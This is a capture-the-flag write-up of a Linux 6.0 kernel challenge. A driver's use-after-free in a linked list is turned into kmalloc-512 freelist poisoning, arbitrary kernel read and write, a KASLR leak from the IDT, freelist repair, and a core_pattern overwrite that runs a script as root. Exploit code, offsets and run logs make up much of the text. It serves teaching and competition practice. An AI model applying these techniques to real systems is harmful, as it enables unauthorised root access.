A character driver that keeps a singly linked list of “NFTs”. Deleting the collection frees every node and forgets to clear a single pointer, so the whole list stays walkable after the free. That is the entire bug. Getting from there to a root shell took me longer than it should have, because the obvious fake chunk placement poisons the kmalloc-512 freelist, and the technique I wanted to finish with allocates from kmalloc-512 itself.
TL;DR
ioctl(0x1337) frees the head and every entry without NULLing anything, so READ and EDIT
still walk the list. On kmalloc-512 with CONFIG_SLAB_FREELIST_HARDENED off, an entry’s
freepointer sits at object offset 0x100, which is the last eight bytes of the
user-writable nft[] buffer. So the list nodes leak the freelist and EDIT poisons it.
Two allocations later, list index 4 dereferences a pointer I control, which is arbitrary
read and write. From there: leak the kernel base out of the IDT at its fixed address,
walk kmalloc_caches[0][9] -> cpu_slab + __per_cpu_offset[0] to repair the freelist I
just wrecked, overwrite core_pattern with |/tmp/x, and segfault a child so the kernel
runs the script as root.
Environment
-m 256M -cpu kvm64,+smep,+smap
-append "console=ttyS0 oops=panic panic=1 kpti=1 kaslr quiet"
Linux 6.0.15, x86_64, one vCPU, and oops=panic panic=1 so any mistake reboots the box
instead of leaving a trace.
rcS inserts the module, creates the device node from the mknod line it prints to
dmesg, and drops to a shell as uid 1000:
crw-r--r-- 1 root root 248, 0 /dev/Sofire
---------- 1 root root 32 /flag.txt
The driver is world readable, the flag is not, so the whole game is getting the kernel to read that file.
The module
chall.c ships with the challenge. Two structures:
#define CHUNK_SIZE 0x100
typedef struct sofirium_head { /* 0x80 -> kmalloc-128 */
char coin_art[0x70];
struct sofirium_entry *head;
int total_nft;
} sofirium_head;
typedef struct sofirium_entry { /* 0x108 -> kmalloc-512 */
struct sofirium_entry *next;
char nft[CHUNK_SIZE];
} sofirium_entry;
Four ioctls, all taking the same { int idx; char buffer[0x100]; } request:
| cmd | name | what it does |
|---|---|---|
0xdeadbeef |
ADD | walk to the last entry, kmalloc(0x108), memcpy(new->nft, req.buffer, 0x100), link it |
0xcafebabe |
READ | walk idx times from head->head, copy_to_user(target->nft) |
0xbabecafe |
EDIT | walk idx times, copy_from_user(target->nft) |
0x1337 |
FREE | free the head, then free every entry |
Two things about that table matter. The walk in READ and EDIT is a bare
for (i = 0; i < req.idx; i++) target = target->next; with no bound and no check on
total_nft, so idx can be any integer. And an entry is 0x108 bytes, which lands in
kmalloc-512 with a stride of 0x200 and eight objects per page.
The nft[] buffer covers object offsets 0x08 to 0x108. Remember that range.
The bug
FREE:
next = head->head;
total_nft = head->total_nft;
kfree(head);
for (int i = 0; i < total_nft; i++) {
tmp = next;
next = next->next;
kfree(tmp);
}
Nothing is set to NULL. head still points at a freed kmalloc-128 object,
head->head still points at the first entry, and every ->next in the chain is still
where it was. The list survives its own destruction, and READ and EDIT walk it happily.
Now the useful part. SLUB stores its freepointer inside the free object, at
object + s->offset. Here is kmem_cache_alloc_trace from the challenge vmlinux:
ffffffff8121a83a: mov (%r12),%rax # s->cpu_slab
ffffffff8121a83e: add %gs:0x7edfb19a(%rip),%rax # + this_cpu_off
ffffffff8121a846: mov 0x8(%rax),%rdx # c->tid
ffffffff8121a84f: mov (%rax),%r13 # c->freelist
ffffffff8121a861: mov 0x28(%r12),%eax # s->offset
ffffffff8121a86e: mov 0x0(%r13,%rax,1),%rbx # next = *(obj + offset)
ffffffff8121a879: call ffffffff814bda90 <this_cpu_cmpxchg16b_emu>
Raw load, no XOR against s->random, so CONFIG_SLAB_FREELIST_HARDENED is off. As for
the position, calculate_sizes puts the pointer in the middle of the object for any cache
without a constructor or RCU freeing: s->offset = ALIGN_DOWN(object_size / 2, 8), so
512 / 2 = 0x100 here. The oops later confirms it with RAX = 0x100.
Object offset 0x100 is nft + 0xf8: the last eight bytes of the buffer I can read with
READ and write with EDIT.
So after three ADDs and one FREE:
show(1, b); e0 = *(uint64_t *)(b + 0xf8); /* e1's freepointer -> e0 */
That is a heap leak with no spray and no side channel. The freelist is LIFO, entries were
freed in order, so entry i holds a pointer to entry i-1.
Poisoning, and the placement problem
Poisoning is the standard move: EDIT index 2, put an address at offset 0xf8, and the
next kmalloc(0x108) after e2 returns that address.
memcpy(b + 0xf8, &fake, 8);
edit(2, b);
add(b); /* pops e2, c->freelist = fake */
add(b); /* pops fake, and links it into the list */
The second ADD is the one that matters. ADD walks to the last entry and links the new
object there, so after those two calls the list reads
e0 -> e1 -> e2 -> fake -> *(fake). Index 4 dereferences the first qword of my fake
object, and that qword sits inside e0->nft, so EDIT index 0 rewrites it. Arbitrary read
and write, one ioctl apart.
(The first ADD does something ugly along the way: it walks to e2, gets e2 back from
the allocator, and then does target->next = new, so e2->next = e2. The list points at
itself for exactly one call. The second ADD walks over the self-loop, lands back on
e2 and links fake there, which repairs it.)
Now, where to put fake? My first version hardcoded page_base + 0x650, that is +0x50
into whichever entry occupies page_base + 0x600. The read and write primitives worked,
the exploit wrote core_pattern, it forked a child, and the kernel died:
BUG: unable to handle page fault for address: 0000000400000101
RIP: 0010:kmem_cache_alloc_trace+0x7e/0x1c0
RAX: 0000000000000100 R13: 0000000400000001 R14: 0000000000000200
Call Trace:
do_coredump+0xe74/0x1560
get_signal+0x8fd/0x990
arch_do_signal_or_restart+0x2d/0x210
+0x7e is mov 0x0(%r13,%rax,1),%rbx from the listing above. RAX = 0x100 is
s->offset, R14 = 0x200 is the allocation size, and R13 = 0x400000001 is the
freelist head. The kernel was reading the freepointer of the object I had handed it, and
that object’s +0x100 is not memory I ever wrote.
The geometry is what makes this unavoidable. Stride 0x200, freepointer at +0x100,
nft[] covering +0x08 to +0x108. Take a fake object at eX + k:
- to control
fake->nextI need those eight bytes inside a writablenft[], sokhas to be between0x08and0x100; - the freepointer SLUB will read is then at
eX + k + 0x100, which lands somewhere in[eX + 0x108, eX + 0x200], in other words the dead tail of the slot.
The single exception is k = 0x100 exactly, where fake + 0x100 falls on e(X+1) + 0.
Not writable either, but it is e(X+1)->next, and that field already contains a valid
kernel pointer.
Worse, the crash was not optional. do_coredump allocates from kmalloc-512 on its way to
the usermode helper (R14 = 0x200 in the oops), so the very technique I was aiming for
consumes the freelist I had just poisoned. A corrupted kmalloc-512 freelist and
core_pattern do not coexist.
Two ways out:
- Take that
k = 0x100placement and let SLUB inherite(X+1)->next. Cheap, but it needseXande(X+1)to be adjacent in the slab, and they are not always: the gap between two consecutive entries was0x200on most boots and0x400on others, so this version needs a layout check and a rerun when the check fails. - Keep the fake object wherever it is, and repair
c->freelistwith the read and write primitives before anything else allocates.
I went with the second one. It works regardless of slab layout, and it uses primitives I already have.
Repairing the per-cpu freelist
The disassembly already spells out the path. kmem_cache_alloc_trace does
mov (%r12),%rax then add %gs:this_cpu_off,%rax, so the per-cpu structure lives at
s->cpu_slab + per_cpu_offset. All I need is s.
cache = aar64(kbase + 0x16701c0 + 9 * 8); /* kmalloc_caches[KMALLOC_NORMAL][9] */
cpu_slab = aar64(cache); /* s->cpu_slab, first field */
pcpu_off = aar64(kbase + 0x166f8a0); /* __per_cpu_offset[0] */
c = cpu_slab + pcpu_off;
kmalloc_caches is the global array of generic caches,
struct kmem_cache *kmalloc_caches[NR_KMALLOC_TYPES][KMALLOC_SHIFT_HI + 1]. First index
is the type (KMALLOC_NORMAL is 0), second is log2(size), so [0][9] is the cache for
512-byte objects. cpu_slab is the first field of struct kmem_cache, which makes the
second read a plain dereference, but the value it returns is not a usable pointer: it is
an offset into the per-cpu area. __per_cpu_offset[cpu] is the table that turns one into
a real address, and the VM has a single vCPU, so index 0 is the only one that exists. On
a multi-cpu box this is where you would pin yourself with sched_setaffinity first,
otherwise you repair a freelist that belongs to a different core than the one you broke.
The write itself is a read-modify-write, because my primitive moves 0x100 bytes at a
time and struct kmem_cache_cpu has three more fields I must not touch:
aar(c, b); /* freelist, tid, slab, partial, and whatever follows */
*(uint64_t *)b = 0;
aaw(c, b);
tid is the counter the fast path uses to notice it got preempted onto another cpu: the
this_cpu_cmpxchg16b_emu call in the listing above swaps (freelist, tid) as a pair and
retries when the compare fails. slab and partial are page pointers that get
dereferenced on refill. None of the three is mine to invent, so they go back byte for
byte.
Setting freelist to NULL is not a hack, it is the ordinary “this cpu has nothing
cached” state. The next kmalloc(512) misses, falls into ___slab_alloc, takes a page
from the partial list or the buddy allocator, and carries on. The addresses move with
KASLR, but the garbage value has been identical on every boot I have seen:
[*] kmem_cache 0xffffa3b841042a00 cpu 0xffffa3b84f62d0f0 freelist 0x400000001 -> NULL
0x400000001 is the exact value from the panic, now defused before do_coredump can
trip over it.
KASLR, and why the heap leak was a bad idea
All of the above needs kbase first. My original version took it from the slab page:
kbase = *(uint64_t *)(page_base) - 0x1936300; /* &printk_sysctls */
The first object of the page had held a pointer to printk_sysctls, and subtracting its
static offset gave the base. It worked on the boot where I found it, and on maybe two
thirds of the boots after that. Then it stopped working entirely: three boots in a row,
the first qword of the page was 6.
[d] +00 0x0000000000000006
[d] +08 0xffffffff9afb00e9
[d] +10 0x0000000000000000
[d] +18 0x0000000000000000
[d] +20 0xffffa0d8012042c0
[d] +28 0x0000000000000000
[d] +30 0xffffffff9ad3c569
[d] +38 0x00000000000001a4
Kernel pointers, plenty of them, but from a different object with a different layout, and nothing that tells me which symbol I am looking at. Residual heap data is not a leak primitive. It is a coincidence that happened to hold for a while.
The IDT is a better answer. CPU_ENTRY_AREA_BASE is 0xfffffe0000000000, a fixed
address that KASLR does not randomize, and the IDT is mapped read only right at the
start of it. Each gate is sixteen bytes with the handler address chopped into three
pieces, and gate 0 always points at asm_exc_divide_error.
aar(0xfffffe0000000000UL, b);
kbase = ((uint64_t)*(uint16_t *)b
| (uint64_t)*(uint16_t *)(b + 6) << 16
| (uint64_t)*(uint32_t *)(b + 8) << 32) - 0xe008f0;
Nothing to spray and no symbol to guess at. The 2 MB alignment check that follows
(kbase & 0x1fffff) has not fired once since I switched to it.
core_pattern
As uid 1000 I cannot open a file at mode 0000, so the last step is turning the arbitrary
write into root code execution. core_pattern is the cheapest option: prefix it with a
pipe and the kernel spawns that program as root whenever a process dumps core.
system("printf '#!/bin/sh\\ncp /flag.txt /tmp/flag\\nchmod 777 /tmp/flag\\n' > /tmp/x; chmod +x /tmp/x");
...
memset(b, 0, CHUNK_SIZE);
memcpy(b, "|/tmp/x", 7);
aaw(kbase + 0x1967f40, b); /* &core_pattern */
Then a child segfaults:
if (!fork())
*(volatile uint64_t *)0 = 0;
wait(NULL);
sleep(1);
system("cat /tmp/flag");
I first wrapped that in a setrlimit(RLIMIT_CORE, RLIM_INFINITY), assuming the default
limit of 0 would suppress the dump. It does not. fs/coredump.c says it plainly in a
comment: core limits are irrelevant to pipes, since the kernel is not writing to a
filesystem. The one reserved value is 1, which umh_pipe_setup sets on the helper
itself so a crash inside the helper cannot recurse. At 0 the helper runs normally.
Dropping the setrlimit changed nothing over five boots, so it went.
modprobe_path would have worked too, but core_pattern is a single write with an
obvious trigger, and by that point the freelist was already fixed so the extra
kmalloc-512 in do_coredump cost nothing.
The exploit
#define FP 0xf8
#define ARB 4
void set_arb(uint64_t addr)
{
char b[CHUNK_SIZE];
memset(b, 0x72, CHUNK_SIZE);
memcpy(b + 0x48, &addr, 8); /* e0->nft[0x48] == fake->next */
edit(0, b);
}
void aar(uint64_t addr, char *out) { set_arb(addr - 8); show(ARB, out); }
void aaw(uint64_t addr, char *in) { set_arb(addr - 8); edit(ARB, in); }
The - 8 is because READ and EDIT hand back target->nft, which is target + 8, so the
fake pointer always aims eight bytes below what I actually want.
And the body, in order:
memset(b, 0x41, CHUNK_SIZE);
add(b); add(b); add(b);
del();
show(1, b);
e0 = *(uint64_t *)(b + FP);
fake = e0 + 0x50;
memcpy(b + FP, &fake, 8);
edit(2, b);
add(b);
add(b);
aar(IDT_RO, b);
kbase = ((uint64_t)*(uint16_t *)b | (uint64_t)*(uint16_t *)(b + 6) << 16
| (uint64_t)*(uint32_t *)(b + 8) << 32) - OFF_DIVIDE_ERROR;
if (kbase & 0x1fffffUL)
return printf("[!] bad kbase, rerun\n");
cache = aar64(kbase + OFF_KMALLOC_CACHES + 9 * 8);
cpu_slab = aar64(cache);
pcpu_off = aar64(kbase + OFF_PER_CPU_OFFSET);
c = cpu_slab + pcpu_off;
aar(c, b);
*(uint64_t *)b = 0;
aaw(c, b);
memset(b, 0, CHUNK_SIZE);
memcpy(b, "|/tmp/x", 7);
aaw(kbase + OFF_CORE_PATTERN, b);
A hundred lines with the ioctl wrappers. Nothing in there sprays, races, or executes a single instruction in kernel mode, which is why SMEP, SMAP and KPTI never enter the picture: the whole exploit is data only.
Full run:
/ $ id
uid=1000(user) gid=1000(user) groups=1000(user)
/ $ /exploit
[*] e0 0xffffa3b841214400 fake 0xffffa3b841214450
[*] kbase 0xffffffff9ba00000
[*] kmem_cache 0xffffa3b841042a00 cpu 0xffffa3b84f62d0f0 freelist 0x400000001 -> NULL
[*] core_pattern 0xffffffff9d367f40
flag{...}
Three boots, three flags, no panic.
Wrap-up
- The bug is one missing
= NULL. Everything after it comes from the fact that READ and EDIT keep walking a list of freed objects. s->offset = 0x100and a0x108-byte structure mean the freepointer and the last eight bytes of the user buffer are the same memory. Leak with READ, poison with EDIT, no spray needed.- With a
0x200stride, no fake chunk that overlaps a controlled buffer can have its own freepointer inside that buffer. You either land it on a slot that already contains a valid pointer, or you repair the freelist afterwards. - The repair is four reads and one write:
kmalloc_caches[0][9] -> cpu_slab + __per_cpu_offset[0] -> freelist = NULL. Read the wholekmem_cache_cpuand write it back, ortid,slabandpartialwill bite. - Don’t build a KASLR leak on heap residue. The IDT at
0xfffffe0000000000is free and identical on every boot. core_patternallocates from kmalloc-512 on its way to the usermode helper, which is exactly why a poisoned kmalloc-512 turns the last step of the exploit into the thing that kills the box.